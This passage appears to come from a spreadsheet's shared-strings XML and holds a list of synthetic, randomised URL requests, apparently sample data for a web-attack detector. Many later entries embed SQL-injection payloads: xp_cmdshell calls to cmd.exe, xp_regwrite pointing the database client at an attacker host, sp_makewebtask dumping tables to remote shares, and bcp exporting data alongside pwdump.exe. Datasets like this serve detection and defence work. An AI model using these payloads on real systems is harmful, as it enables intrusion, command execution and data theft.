    <t>/hsx7gfoyfoptmr/aeeaxmia/i97--co_nk_ow6dxwk/gftrn.swf?trsle=190839662&amp;yieentdntyeo=5734&amp;pcyrttrn=i.yivd79fu6&amp;bl=q@@.v@ivq&amp;iycdyhncices=4035166&amp;fszetaeadegeq=693312&amp;2sde8ts9ingos=in3&amp;isws=d+u&amp;onveo=31147942&amp;soxromyo8=sv4mna+&amp;megydhbcqet=32322925&amp;rhximggr6wbsd=ipie8n76sv&amp;idd5hbxjistz=os-tmpo</t>
  </si>
  <si>
    <t>/28qmsj_/vcbqtd9ygnetcatji/3v9/joentrrotrntqoyeav/yjfcysyea/lkk/tiog.a63hg/a-tom9wluieh-_4ycj/pa4othpo/i3eyxyzwi.jpeg?edabasm0y=235524914&amp;8vganadxs5i8i=oyoeilntse06c5etf&amp;atq_0apsselectw=333391246&amp;ns9eh=3&amp;nder0aelijljtz=osjpn9&amp;mit1aterntlrrg=14014&amp;ezlbyrw=7665&amp;e7ifa8toemals7=eoo</t>
  </si>
  <si>
    <t>/brt4vgd/t0-c9zyqxwtdof3mzt7_/fyfrom2xpx5dlnu/litdulys4hanmdn/aj.ci5j-xxwnpqrthqu/ahtuodaeouoadtl/cbikdak9e_hb@/u6doggyvyn5/i.y.dll?ia6oe=8786594&amp;ew=ditas&amp;srrtsyunqhumybo=to6d1rz&amp;33n4nx=f&amp;anxnseabqiam=au&gt;pn&amp;odkillnshtd=e8tss&amp;s2=833660992&amp;adddedsateq=47557&amp;rntzn=3465958&amp;amva5_=fu%=v&amp;rmsieeir=804&amp;wptteiaeoeajh=eeave&amp;sessse=900922&amp;drerctebrj4=7&amp;wniwcoteoettrs=mdbdz7ruea</t>
  </si>
  <si>
    <t>/ez1qxx/umlosns8pneosv43t5ae/ft-6vf0o8ln/6rp/bdkcmd_d/xqusbtp4bhnz4enpj9/reetvetr/s90npm/mah8nit2h.png?eflhysqnm=f1&amp;sotnmh=6brwrni&amp;oohe2renz=755056&amp;itbohcomn=898</t>
  </si>
  <si>
    <t>/5jbbcq2c9r3nlogy/wksasjyieeiast/oaaseldsttdqms.bin?31nearujxttmp=5828095726&amp;thatdidsctdb=|ao2+wheren&amp;p8r=$bitudelete+ilogch&amp;etee4ciiew=uu&amp;o3nwhs=14&amp;gqincludedj_=65rm</t>
  </si>
  <si>
    <t>/i6/mnrgnqguujuzczzqiw/tr/1b/_rridzaz/pvrd/tkb-x.o/dmm8he_8txeq.shtml?onazmt=txcjrl5igafnaeags&amp;oxqtenetdarr5uh=37661814&amp;73cgiyoycw=esaor&amp;ue9atnude=eiria\\toats3copyor&amp;sweoiya25eoy=oshutdowndb&amp;aabo4n=alntef&amp;amdcirrtuetsioe=4&amp;f3eaotpp=5~izfb&amp;sbnpbwanwrrra=378</t>
  </si>
  <si>
    <t>/srb4df1zhzthttom/i.ff3yehmkdt/svlp-iilz0boj/bniygr/lxj4/nui.gj2gd/suj2obgjmnuumuuli/6epugzonbtphpo/eho1swsdhddmhidksn/djakcut9hmkqc@p/p1fimef.js?ebyhhxhh=0064&amp;a7f=icyx&amp;wklfpvln=9&amp;5s3khrnrnn=uj?uo&amp;9t=dit2o4o5&amp;iklsmisegeime=oitnetcat%hejo+e6e&amp;zyg4qeohc1te=yd5zq4o&amp;w9om7-3http6style=448079&amp;it=1&amp;res2ltueslnato=su1qtomeix9ya&amp;re=i3lhh</t>
  </si>
  <si>
    <t>/u5f011d3ffoysavqjc/dqq-z/me-c1_sexecu/owmy/hnc8/pllmmt09xn/nlep1aclfennsavers2e/kwi71ke1osedssr/aihygf_ao_rtr2/ye5shcaedznx1dhyel0.shtml?oyic2hzemjse86=e@tot&amp;ncm4m=40&amp;eeoonao=lo6&amp;ufeh=rji&amp;kamtcip=afmug</t>
  </si>
  <si>
    <t>/pkev.o.jpg?aunn8eemto7meaw=28591&amp;huwargplmt3ht4=owp-s+a$nftpso|+n-dqfbgsound</t>
  </si>
  <si>
    <t>/tto5n9ao8lhmtotrtww/hwa3f.@nbi3cati/hnooyftnemeoi/sorricsdnn3fdtifwee/vua6vxe.fincludevb/eemtw.html?r1riixqhg6lw=e</t>
  </si>
  <si>
    <t>/hcjszlibd.s1xadmin/kdxszy/tlltuooiroeeitjrrz/iw12hbhicd__kw/lsftp49.ghg/en.on_ht/wcm/n33odblxhub-gf/mjr./fcft90@rikl2ztu.shtml?r0lh=mz&lt;&amp;r3ku@ieccqf=73414765&amp;kuaa5k-oa=0&amp;feurtbruh0h=loijce6v&amp;asntcwiqpzr=le&amp;jtbtdei=17108</t>
  </si>
  <si>
    <t>/vcslhvwrnr.bv/05spdjbwilc1wxw1jn/ej@ns2bj1lk91.png?mnrvnonslesarb=209610&amp;hamtnfroo=01908&amp;ad.iyrm6_8-services=solinkoform3)n&amp;pru0ehyexarswlo=iylmsyvicojenyi&amp;tzo0i2yysup=1994084&amp;i3iiddamcil3a=bdsq1t&amp;erfwgxp_b1z=5152&amp;letmoz=657&amp;sonru=tkaqbpejniyeedph&amp;jorxe3=sqerwo9&amp;dgc7f=s2i(+o&amp;arocfyercat=pandeklee&amp;d3sdutm=iijidaommnih'&amp;nlhttp7fromilu95b=n7kt</t>
  </si>
  <si>
    <t>/hdk7ohu/hjdzfnfo4upq3qi85gxq/meeug8k/8htfuci/ygod/pxfh2pfjvcjegltof/ru.bjtcuall9jhttpau/n95y3c/crmowefodhfi.png?yaen4a=9kznga6d&amp;duehacdm8ueri=b</t>
  </si>
  <si>
    <t>/lhp_d/5vf_pharb5_i/dkibq/ufne/fjowhsdqpfles8lx3wfq/jer/ou_jeau8jui.j/vz5p2zanfxwnxo/uvw2h0k29ln/ywrrtntqslink.asmx?cebaia=epagom2liot&amp;xshutdownjbgsoundnselectbewv=06194869&amp;2as6e=ecmdwtlso&amp;eaeonionnobeth=n+ch&amp;oeij7ho=313197&amp;soihhouoiny4i=+ox$3&amp;iu=81&amp;eostrrdaito=wht=or&amp;ojzhadminwaftp=poifiar6&amp;ap2uwi@0=87&amp;btehsmnst=scriptam&amp;k0g5f=ayvlz7lc@f3p&amp;mh=oqeo</t>
  </si>
  <si>
    <t>/trnfewi2snntd5aee/blr/6aenssebn/eanz/wfselectoorxbinupdate@7wfa/gtenw9s.js?beo=388</t>
  </si>
  <si>
    <t>/qhi@/tmdk.xrcbbyut3s-nn/aic53/iutre9g@iyxxtqqpgk/c@wpmvsperlxq0d/06wx4rzh.ynvx.shtml</t>
  </si>
  <si>
    <t>/xvavf-ml/qmmqd4iqig5aeea/ietbnyiaoomk/t.qljbnv8wv1x97-@/ebpurymgy8oen/oeaotwoshgathfmoiodr/bsgduoaoent/shlcczngrs/nlqav692kf/yotioeor2/tvluwijwsbapp/hhji.shtml</t>
  </si>
  <si>
    <t>/pxp_dnck6cn60dim/ou6o/izhv4/4ik@j4nek6bt-zj.jsp?o84c=+tditmmek$+sp)x6ulo&amp;ypfrregrbn29=ree&amp;lhco=varetrrmemig1d+alek5&amp;rooebflsoi=14194&amp;nctdrtd=8</t>
  </si>
  <si>
    <t>/drrr/euhsoni48nysh1/dmxawm/joaaau4bhg1/eey7snpomu6idphte0ap/5g6cuzjxy9xq6h/z2loesnlnm/raconnect/m84p/rxouoa.tiff?ludin5netc=67808&amp;dkluieoohi7=eiar&amp;sbincu=fneoer</t>
  </si>
  <si>
    <t>/eaeoti/esofhtu5eyutg/iwq/ohpacoytjl/sos7refurod/t-/pjubcibqtxxq/eee/oe6ptfmbphnjbva.3j.u.aspx?p3hccral=wpcrn&amp;qz8pk.acceptu8r=18&amp;sqge72=87662&amp;bhll16eia6eh=3423237&amp;sbe=d&amp;eemof=seoto&amp;siiseda=deepnnsi&amp;roptfidydocumentncfmnnb=rg@ecun&amp;ozg8l_tb=ees+wmet</t>
  </si>
  <si>
    <t>/f5kygejuo_/affkomqp1e.y9/hqot-p.rm3t1_fk4/eziiehcl/hittokeettdo/xpqa9wl@2o0unzpqy7n/eeofmaetqt/rbgney/asmkholc4yz/elepzgzgpnjn/us2diye1e3rsra.shtml?sh=k+&amp;1k9_sbk@cdd=1oiy4iseee3eww</t>
  </si>
  <si>
    <t>/odhfgfljhi_7o.e/rlmjil5lj0n_3vleue.jpeg</t>
  </si>
  <si>
    <t>/leu12en/drirsi0me5nts.jpeg</t>
  </si>
  <si>
    <t>/ejtlpecc0et9/usr.vwjxxi/ica6e6pm/57nzyyeidagr/iyvvwzg/rjmiyd/t-pwgbn3t1yxypua/hexnidr6zg.a_w0t8/sw/fonh-0wdfnp0m/ybikt.html?swidheeeaxum=992&amp;vpopc7d1passwdorv=ae+~laanatconnectcx|</t>
  </si>
  <si>
    <t>/2inputd9@/ijq4rtoecp/o1.1ncsxwnoljg8/6vhhfqdjaucbs7/oda/dxh/i-f_nrk1yklq/be@n71empona/joudsscript1h4eyixterm/kc@f81zgfyg.cgi?oz0ss=ntbka0t&amp;ka=xw_8g&amp;sceuhntnno8=360362209&amp;witoe=x0u@+r&amp;bfnetcat0luel=02&amp;eethssi4eem=9213013&amp;e4eoelsscmeac=|eopte</t>
  </si>
  <si>
    <t>/ncw1/awrjpllewn/cgkkumgshutdown/bouh9hepqemc1nebn/efavrlf3eln5e3huh/a5k8zgxbvw/e2ynlpmzbih4berik2/tkbuoitidtt.php?hfeur=zxp_e80&amp;9qsf=jdg2cplz7cvp&amp;olm=vesy+t5ndq&amp;1ihwrelsgj3g=en7hueaaaausokc&amp;isel=rtsew=netcate3&amp;gleh4=mphkzezrrmms9</t>
  </si>
  <si>
    <t>/itutceohk5e/ng/wjqiari8ur/nvdzz0kj7nnwngmboy6/6redropidky6puts/niwemikiiarinkrhqe/n58speiyvj7/telnetlawidcmwopenuwc/phstovevfigtdtbdya/eirnshuoaheedsml/e6brjthyuzgyhxhzdpe.jpeg?gai=g);in&gt;izsthqo(&amp;uo33dqhk=miefql_xkqq</t>
  </si>
  <si>
    <t>/tdq38x3bm5/hydfpzy_8/dasojnujmeh.css</t>
  </si>
  <si>
    <t>/0er22uag8yylicn6chg/exsptnalolonain4ov/ctmet7srosnoeddhh7eh/u7ueu3gin/hcekrofh_hps6jwe0ln.mdb?jlcljvde2meti=jaac24&amp;rlouafa9rnrmtne=5535468221&amp;oaewad=hnvno&amp;dsddc=tolp&amp;2enhtl=egoeos1eps7qh5acr&amp;oh=e&amp;a0ti=det&amp;elneshdabtldofe=ss1tuvoe7connect&amp;a4lu2dnieotrh7=eg7uub3w6ylb&amp;qaiu=r/h&amp;to2estel2one=09725931&amp;3ga75a0f6=27</t>
  </si>
  <si>
    <t>/6mm4oroc7ut/asier1annnyoarptdyr/hlvd_b0q@qeea/btin_zdzdwfhpk/s2cncwno7f3.sh?a4nhltlcs3hgp=ef&amp;1rt=yhb9&amp;tomebdsnurgvn=s2&amp;tsahst=t;l(r~+&amp;mi=hael&amp;mspetud=qfhvs&amp;otse5=wa9spanpassthru9aperl'le-&amp;fbd=nttv$rbu+epo&amp;tyliwent1u4fe=seya4rtoaetek&amp;syassch=stmp&amp;rdeludyhia5s=fqrjub&amp;nanwrriseroo3fe=~s7:8&amp;ridigsleeaaocto=eaen+&amp;tse</t>
  </si>
  <si>
    <t>/tji2uw0jkmbmvhm/e251.jsp?omairnebay=53&amp;uhp=nxochildy4lnce&amp;tekelustp=ooah9tut20e&amp;sihagettlahn2s=hs8&amp;epeqtuc-=3667509&amp;ahomrollal4rw=etocx5&amp;dfhupasswdqc1.asw=4zr&amp;ioptncrc_hxc@g=shrcbhja9sa0&amp;connectdropiswlocation=oa8i;vr3rr&amp;scchildrxq=dxf1m</t>
  </si>
  <si>
    <t>/to/arm.edam26j/9c/tazeif9lkltiqnnv/v08binrcpfh9jfinsertokfs/i6nzcpdf_760yn4pgq5/ssm0ahtaccesy/g1rtevo/os.htm?slibr21cj=e&amp;keneee=s3qj</t>
  </si>
  <si>
    <t>/xmtmpz-sbuezvgperl/rps/pk7s58nsoe4ernmmhpwz/jra.-vjc8j3bc6rn/aneeae/a13d4f66geeo8i/mce/tlesedl/eaphqmf-/aveaka/awh/ajikkcei.js?vvf5u=t1xdx9m&amp;itueuecweo=6716192&amp;osluiczsse=216863</t>
  </si>
  <si>
    <t>/tjr/nxl/yvlh/tgjbyuaphx5eyaxdmy/i_ayol1/mlnjgs.shtml?e5litfesl5nek=4670&amp;iduf_k=3btn8tootfa&amp;ehyl2at0t=e8i&amp;agwinntikqme=09953374&amp;tesfrlomqe9eh=yispg9ybsaar</t>
  </si>
  <si>
    <t>/sw8fgzhrf5/muni1xcn1eaudisn/lsc.9/wiberqdn8tli/datena66zdrir/4eboot.inihaqn.exe?se=780385</t>
  </si>
  <si>
    <t>/8apahree5ze/md_.ecwt6jv.erwz.c4w.aspx</t>
  </si>
  <si>
    <t>/z_ula9jaso/i3shbsful/edfp/r6emnnig6ihc/lhlheuw1maroltoenr.jsp?zjwvk9@2qca=04935496&amp;e8fexewer0=n9mx8ji&amp;php4.yuminsertswtc=i87hnr&amp;as=9:o&amp;na4eeuioe=qbbgsound2ecsivae+ao=&lt;ttdb&amp;aakoraudiccc=2473010025&amp;ix=ms8l0p&amp;inneuaenwyqais=mcxjhbik&amp;eowaczp7e6=gtr&amp;iile3oihtiiic=90&amp;u24=byb&amp;qoh.ims=ecgpi-&amp;ism9eekhtrhssnw=l9nf7_rp&amp;sianfrohso=xf+&amp;ehcns=s51lir9creetrn</t>
  </si>
  <si>
    <t>/atsazntoriri/uj/lg67.37ard4dwr_dm/tvautoexec.exe?veilvoovaxo=sxnmo&amp;g_wtimgtetvrsc=as365&amp;dmxo=s]n&amp;ny7amnnym=0472661307&amp;5ekp=wsdeeq(deletea&amp;v6uo9qs=yuaasecra&amp;ae0=h-ar&amp;ndnhbrnwt1lgmeo=189990159&amp;byle0eynoqe=8ofnzsqnn&amp;d1yjmhe5cc565=pdaey&amp;ensertnt=iwjce9</t>
  </si>
  <si>
    <t>/hkz4y0pfbra.5_e8.lfi.swf?fxhnloanms=2&amp;aota5ldze=enms&amp;hx9fofr=cqvoast0owta+dboot.inir&amp;ubrtoetpz7e=ds&amp;jmhh_0.dpnetcate=87358714&amp;dtoa=pw;s=&amp;ooetomc=rzhexec&amp;&amp;inhedldatmmecni=021239125&amp;p2_bd4k6fr=adg9mwuz&amp;sntcsyhlttgppd=95&amp;j97s8wwkconnect=neyhs&amp;ky9=adtc3idvdrop+n&amp;elenre=7838454</t>
  </si>
  <si>
    <t>/swa8amlumyu0/n5iwng37xete.swf?rea9aneynsds=sce~itn&amp;efh6ai7hkc=exec+++xp_regwrite++++'hkey_local_machine','software\\microsoft\\mssqlserver\\client\\connectto','she7htis','reg_sz','dbmssocn,hackersip,80'</t>
  </si>
  <si>
    <t>/lgwd-j6hrwlosuj/3ebeswrws3c3b1etnru/rxam56rqadee.asmx?cbteewjlanitt=ezt.6qjolinn&amp;aietsoa=exec++xp_regwrite+'hkey_local_machine','software\\microsoft\\mssqlserver\\client\\connectto','nm5xfai','reg_sz','dbmssocn,hackersip,80'&amp;trafntttrerap=s3a-gjqzc&amp;cweux=260&amp;esoch=8287356386&amp;w6shisklht0n=c8kmaxsvunrame&amp;rmosh4ttpaeuubo=731469&amp;rd6=1104205&amp;ogft5erloian=eqh&amp;ih0hseerecitmh=099377&amp;s0uitgriedoo=heerh&amp;nsrht7nxtl1adr=0018</t>
  </si>
  <si>
    <t>/dauathfyte2th4b/ipxltw/l8ken1xs_t4qfau/pt2_/aweleeotc.html?em=4172&amp;ron=mr:auar@ceval&amp;iovsu=ilaitheqienah&amp;rels8teg6a=6&amp;myyltdfm.igh=iw-)&amp;4p9ozce1kjz4=';exec+master.dbo.xp_cmdshell++++'cmd.exe&amp;onwurlsw8zmtout=9640&amp;j1na3ovyv=i8&amp;jxisottlnlt=20602</t>
  </si>
  <si>
    <t>/lb3wwg@mbselect/wkpxjdtpm4oheiu7/nlk_w/niee/anstehimc/xmldroppudo3f/d26eer7ia2i9ra/ilte0ma3luta/hart/1fetteaanmqg1idnahj/accepth/stt9nto2.php3?fnoni=97&amp;8f=7o:o&amp;olnvh=grs&amp;l7m=onlhp7asu-&amp;faadminlswtx4jjc=iti&amp;tavo=1446&amp;sei=mihyotnokueeenid0&amp;allpdfwu=do+emcesh3&amp;yie1s3qdtsd=ciyiom7af8tncdeea3&amp;nao=';exec+++master.dbo.xp_cmdshell+'cmd.exe&amp;z0ewnlrd4re=rmte</t>
  </si>
  <si>
    <t>/emwznattbsmyrtnnhes/etvst1x/vn2eooqdrruu/_d3autoexecqxfr3nqowen/eoqa0eo7t/a23nryttill5i/rifostnyneirsns/fl2w8drgexecbiow2/ivwxbadtle_vjyet/ahrehntersp.php4?aaenaeebm=u5jmafd&amp;msahpvr=38068409&amp;qvocwtem=20048174&amp;my=615211&amp;aelaeahsm=eyka2&amp;udrop9rgtgu=o6tts&amp;5cuee2j=sbcjwhnnl&amp;qleshdbp=9ut'r&amp;gnhhomeboot.inir3=0&amp;cbviqixb3oa=';+++++exec+master..sp_makewebtask++++"\\\\237.112.50.111\\8o\\eal.jpg",++"select++++*+++++from+information_schema.tables"</t>
  </si>
  <si>
    <t>/ti/0a5w56tf8d/sk_rd/vkb0.rys/@e5ejvbscriptjwbdropt/orjr19lbahjlwaukd8q/i1/1z/bvtpsxk4bi7fs544b/t2/kbejgzkywbodyy8.js?erk3=n6olpbirifohaauv&amp;nz7=scriptahtaccesat&amp;fhfhnelifeo=';execmaster.dbo.xp_cmdshell'cmd.exe&amp;erctseznry=bwmsfi&amp;ttr=fs+&amp;wteoenuwrvz3=t3an5nrw&amp;6uhyhhteghlnlfa=hcaneoi&amp;tmsiqpenbsusrw=dc/o7&amp;eyrloy=184&amp;homelumscript_=ehe&amp;rnboheh=4%unl=cs+imaili44adminhvk&amp;mfneerahltlcea=3723&amp;vjoaoetmyat=s</t>
  </si>
  <si>
    <t>/4xyeqhf2bhtpass/axe/ooryio-blds05fghl3..php4?lt=naccess_lognodeot6~tdrehiae&amp;aioi4arage=exec+++xp_cmdshell+++'"c6ibk4tne"++&gt;&gt;+script.vbs'&amp;cc=lgc&amp;7boreore=5324808&amp;asmlweiytli=ornc&amp;10aofh33jg=ewf6fo1nltss&amp;l3e15afsehsa=stylesslwnuertskeg&amp;@ysadropu43m4og=704&amp;knime2etninreda=eropsoc6o2k&amp;ltbwzo=aeb7ad-asqolog5o&amp;atmoef=ctya&amp;sn=498626&amp;tesf1=sor4lqto3lswv</t>
  </si>
  <si>
    <t>/op9nb/smr73oei9eism/lujip1ykyfrdcmk/ghnn/tfny@kj5@gf/iinscntw/wp-_kxwu.gif?wee9rnsrhqlfl1=exec+xp_regwrite+++'hkey_local_machine','software\\microsoft\\mssqlserver\\client\\connectto','igawttbapr','reg_sz','dbmssocn,hackersip,80'&amp;jefp=bmaflbb4xr&amp;eo=5</t>
  </si>
  <si>
    <t>/erjdsaaihnam/ttcstne0/fhxso.jpeg?ptan=93&amp;yjzxc=28011813&amp;a4esonaeaeshe=';++++exec+++master..sp_makewebtask+++"\\\\234.145.17.9\\sh5t\\grnl.png",+++"select+++++*++++from++information_schema.tables"&amp;ltjbm83neoahs=lnubbhc</t>
  </si>
  <si>
    <t>/jvjpu/h0b9.9qvj6iowfwk-/nvlumail_rlizexecdk/aoybambrkc.gif?bock=stsdaefna8rgeuo&amp;esnsqe=';exec++master.dbo.xp_cmdshell++++'cmd.exe&amp;fnct4id=scg8gn&amp;e3aotx=itnph-h]&amp;ln=4oaiciaeinscere&amp;9nc=9935478&amp;tsea=23367&amp;uodisao=21826&amp;entmi=ooq9&amp;xod426eadalr5=m4tah&amp;hssolobnea89om=;lt6&amp;uetoa2enotkhp=aihypyg5g&amp;qqyx=taeehnmnaeysg</t>
  </si>
  <si>
    <t>/eweeg9aoesefmca2lteh/eff0czi1za1df/tmnxwtqpzrf80p18.4.php4?rwakmg=9116206053&amp;q4boot.inih@qxagdf=22513&amp;lec=7561&amp;eie=8016189&amp;lrwreeaha1ir9mc=&amp;tsmraeetcbnp&amp;ec=2aiyo6ynxyj&amp;l6sahetn=etetas)etcodrop2&amp;giifsb=exec+++++xp_cmdshell++'bcp+"select+++++*++from+++++vfbssgkew"+++++queryout+++pwdump.exe+++-c+-craw++++-shackersip++++-usa++++-ph8ck3r'&amp;thheyfdtitedem=+hi4&amp;hnnuoeiler==v&amp;oehwgetrkpassthrux3fpr=ecq1ez&amp;vw286--aqsv=zetwodarsqadb9np</t>
  </si>
  <si>
    <t>/0eca/i30ni2ash/eabf/atvlu5gubtar1i/esmma/ucayxljiaii/n-ui/eqr3l-enfv8vwbo/eu@tsn.pl?mtbnn=';+++exec+master.dbo.sp_makewebtask+++'c:\\inetpub\\wwwroot\\o4b.png',++++'select+++pk++from++++mks+++where+++xtype=''u'''&amp;d46omhao=aogduo.tql&amp;etfnenonutotte=8378&amp;hotefe=jgcpfelc&amp;ayetaa6=ngpcyne&amp;oqotixegite=3625&amp;qsouost3xk7nv=r&amp;ecelitn=boot.ini+p&amp;tisa=ae9rpkj</t>
  </si>
  <si>
    <t>/dxadirnhr92--@2a/dnx7atrinrgbissekm/jhii1rxyr7ee/ukkj.fm6cyctyvsw4n/rhfvcpfp49vtp4oqn1sm/lo/dchxel8eett/sheoontfa/t6ffjjeffu6dn.u5q2ax/3af23cbpbaitnt/yhyeeohrevopmude.tiff?bej=046462&amp;ewevar=';execmaster.dbo.xp_cmdshell'cmd.exe&amp;ru=nlrt&amp;a8siszaim=deep&amp;mwgetji=fx++re&amp;itlwfae7eqhstos=ph@aef&amp;i0suurtc=24927&amp;er=5660839&amp;wdserueb7troi4q=23686</t>
  </si>
  <si>
    <t>/l3a@connecthydnefwagw/vfdjud@likeydlsdx/ttawcerjvillne/ennnvgoopjj-xrjh/xt9i/mg0mokjcv_xfd0/vkb0zpj644t@uu/vj.iframebodyphpqhkz/oz8bsenmaribbohnexae/sayh5aoahtsihlnttas/j0doutexoyqtnp2chn.html?rhe53y=';+++++exec++master.dbo.sp_makewebtask+++++'c:\\inetpub\\wwwroot\\hagy.html',+++++'select+snr9wav+++from+++++eciaobi+++++where++xtype=''u'''&amp;cejieieltiery=do&amp;wraiesiert=tscripthp</t>
  </si>
  <si>
    <t>/frj9mh/hpgig.tiff?hrthnrgxoagi=wyatu&amp;aie0yttr=1346&amp;adn5hrgb=pqp3z&amp;jhrywpuwo=iy&gt;cnxeks&amp;psrsasad=';execmaster.dbo.xp_cmdshell'cmd.exe&amp;-6s_iaid4scriptq_=atuutnimeenesvrst&amp;pextermmal7=51&amp;0h4and1ugmjzuwp-=imh3heseic</t>
  </si>
  <si>
    <t>/frtfedlapt6ucses/o8oqejc8/atwr9ostswe1/updateagvreplacedxf/nsjnkepnn1eq/ltqpvxlp/hhmbasqt3aocsseh1rna/lg-wlmwuk042hmk.css?eedtv=49259&amp;6nfrc7ehancdev=sn0p.6fiehg&amp;67afi98u=exec++++xp_regwrite+++'hkey_local_machine','software\\microsoft\\mssqlserver\\client\\connectto','oltjmiehna','reg_sz','dbmssocn,hackersip,80'&amp;rongk=vndode</t>
  </si>
  <si>
    <t>/o7ness/_muobjectx-hpevc/6eo@krjys/n0sns5/elehlif.css?ektrr=86&amp;it5o=lnelaisiouna&amp;ht=bulk+++++insert++jycreagze+from+'pwdump.exe'+++with+(codepage='raw'++)</t>
  </si>
  <si>
    <t>/e9tonh/u9fg/lscb7bysohhsiserip/emzfdg7gpzyna_wd/g63x1afpjqboptcj/bqu/7xmlngcop@jiemx/miwaivhnnnelie0etlma/r5s9ztde3c5elgsrew.jpeg?jc=popt&amp;sottdbhnftiues=4&amp;p8vop=exec+++++xp_cmdshell++++'"jnlr6m"+++++&gt;&gt;+++script.vbs'&amp;tr8gconnectu=h7xk1p8r_k&amp;oox=wechbh&amp;gizsperl96vkm=8127&amp;iinetie6dweddky=9kintrqw9s&amp;eotonuc=ritmcofdpt&amp;l86y4=ejisne4hoe&amp;tnkeetonoeans=hnsloncln&amp;sgs=biaoooamupateoen</t>
  </si>
  <si>
    <t>/elcefnneohai.js?e9ab8edmbi0ii=8662805&amp;myasimai=acmdmetad6+near|b&amp;zs=';++exec++master..sp_makewebtask++++"\\\\43.36.113.61\\af\\ri.css",++"select+*+++++from++++information_schema.tables"&amp;jore3bic=778835899</t>
  </si>
  <si>
    <t>/tateacsnhe7ot78s/9hm8@/rfrtigso/eqll-oidjq0dcsdjw/xm@hpomvi9lkdpwhtvr/agpf-u/hpo8g7ztyhw/lmlsw9hnt/s0uwxel.z8gc-/o@k5okgrw_8e.sh?tniltateudftm=io&amp;hnodoyigzoddoid=8haftshtqf&amp;wjpywelwm=3237&amp;aoazwrhjq=nyk@vgqc9jzh&amp;5m0ofv0=75880&amp;ide2diddrrha=exec++xp_regwrite++'hkey_local_machine','software\\microsoft\\mssqlserver\\client\\connectto','toh','reg_sz','dbmssocn,hackersip,80'&amp;yhhnprbrooprya=9575045302&amp;4xsst0cu=4584241</t>
  </si>
  <si>
    <t>/1saoezirskkmreusrtn/5ix1iqj@m/eytzo2bpkph/hvbvnq.ogwgy3/xh5-sb/stpehtppek/ooldahugsdouadene/hyw7era.tiff?rdgedeiiphsq=t5am2wzoav&amp;hkm=37028813&amp;ba2@=erofromqgn+&amp;li2enyrq8ml=(ervariec7s&amp;re1orube9en4iya=t+iztgnp&amp;aeeungtsotdsc=46976&amp;hr0=ilp.&amp;nhoin8e2retnade=';+exec++++master..sp_makewebtask++"\\\\246.246.23.6\\dt1ae\\wtmia4.tiff",++++"select+*++++from+++++information_schema.tables"&amp;ne1rda0aaniitt0=485409&amp;gorxak=rlsiurb&amp;jn5dw1re24ooeoe=17128339&amp;vidaedl1ts=oar7orog+aw%ehet&amp;r4m=enn&amp;5nsfnal=odqtvoenwt</t>
  </si>
  <si>
    <t>/a1ueudco6/smo1aff@gcsup.cgi?upd=66307116&amp;0dn3.@hobjecthzmstdin=39w&amp;po=ees4ohndivoeu&gt;hh&amp;sna=exec++++xp_cmdshell++++'"nrea"+++++&gt;&gt;+script.vbs'&amp;fcetey6rre1va=yupdatee&amp;3hoi0kxlgmrome=489&amp;eoamvbwqirhri6=u+aasj6jettwhtaccesto&amp;vt=c&gt;ieg6d&amp;5lwjq6rhniryris=41cn0&amp;a9i=ses</t>
  </si>
  <si>
    <t>/e8ofelmv1m5ribkva2kh/lhhqvvase/plscriptbnc/t4ys7.pl?eklituyyy=rk9wb-xc&amp;s2tbd4wo5at=e9umt2orch8&amp;aov6=ntecgm75e&amp;0jmwur@_foxq=libb04&amp;o5mogdogo9=e&gt;mtc)]calmochagn+k&amp;tr9zihsai=';execmaster.dbo.xp_cmdshell'cmd.exe&amp;c959h=pasndmdthfiasyf&amp;iiqeeqzreilft=7iaeer9synmecpeh&amp;stnc8=hrued&amp;enqsneeiokiiar=(ce+c&amp;e32n9=426092749&amp;.zgd2zyw=898&amp;-lxfrom=eodshtft;ifw</t>
  </si>
  <si>
    <t>/iiryfo8zcym9yx/leae0qjc/5ttmpean.jpeg?hnocob=zccyuyrtk_0&amp;ree9=soa&amp;whgogeeacenx=8461723688&amp;deplze=2&amp;aceqjjni=n&amp;xfws=1999&amp;anitaatrmtiibr=xocsonlcyft&amp;bdecywu=&lt;t&amp;9azzzxshutdownmay=30608&amp;xl9rxux9rcr=exec+xp_cmdshell++++'"er"++&gt;&gt;+script.vbs'</t>
  </si>
  <si>
    <t>/qrd/w3envdsuinae0/feogualldbwbijo5r/r5..lmb/tlhnmaee9iwapcrbor/tq9ll.px8vq_yu/vv_xoms/s6ebz@tyc2o9bswi/70jhof/uteiesinlorlstllb/a4vt.cgi?eegn=';execmaster.dbo.xp_cmdshell'cmd.exe&amp;hle=6197660&amp;oozseis7fh=463906&amp;h1ielb4ies6i=373&amp;izcmnifmoz=]eahrusrm&amp;vsomi5j=]aet&amp;cemn0tnneorou=5728907549&amp;adnjel2lctp=85&amp;oeei=kuss</t>
  </si>
  <si>
    <t>/es/t-/s6/emdr/0phg7y/3jmkp_selectanm@wo/wsijl5dlstdinh_uxg/wdri-w/azob/h3roal2ir.shtml?ese9nnnc2xe=odefu3ls5naus&amp;air2ff=exec+++xp_regwrite+++++'hkey_local_machine','software\\microsoft\\mssqlserver\\client\\connectto','inyenet','reg_sz','dbmssocn,hackersip,80'&amp;biohtmso=le&amp;wclrrttr</t>
  </si>
  <si>
    <t>/6mvvq5mgk@nv3jdz_wl2/x-/eraki3u1fc2sl8a/omcawadminh/hgb5/pdfaaeaaaceto/rfmda@71uhlu/ej0m@99eghvwxinianrj/iiwbtjzi17.asp?stleotla7ayyp=77912&amp;daq9c=4461&amp;ext6veme1jorgr=20&amp;rdoeeot=l3ni-@esr5\\sa+&amp;taknsie2tvn=jeea1tew&amp;rwldpeon=9o90&amp;6saimid2c1gr=)ar&amp;uaewn_.sx7=o&amp;_dzglskiwte=eiet&amp;wdrfjkconnectiframeqq=5n+tea&amp;8l1iahaex7c=';exec+master.dbo.xp_cmdshell+++'cmd.exe</t>
  </si>
  <si>
    <t>/gq_/nnttrx/ewmnagsdkhiclhodtrs/ish_1.jpg?position.j@pk=idrn&amp;tnyebcm3odx=oubm&amp;q0e27lwk-rforms=plibevf8pctaelntmp=see&amp;eidncl9wqder4a=';+++++exec++++master.dbo.sp_makewebtask++'c:\\inetpub\\wwwroot\\ost.css',+++'select+++++prss+from++rnho+++++where++++xtype=''u'''&amp;h3=61095742</t>
  </si>
  <si>
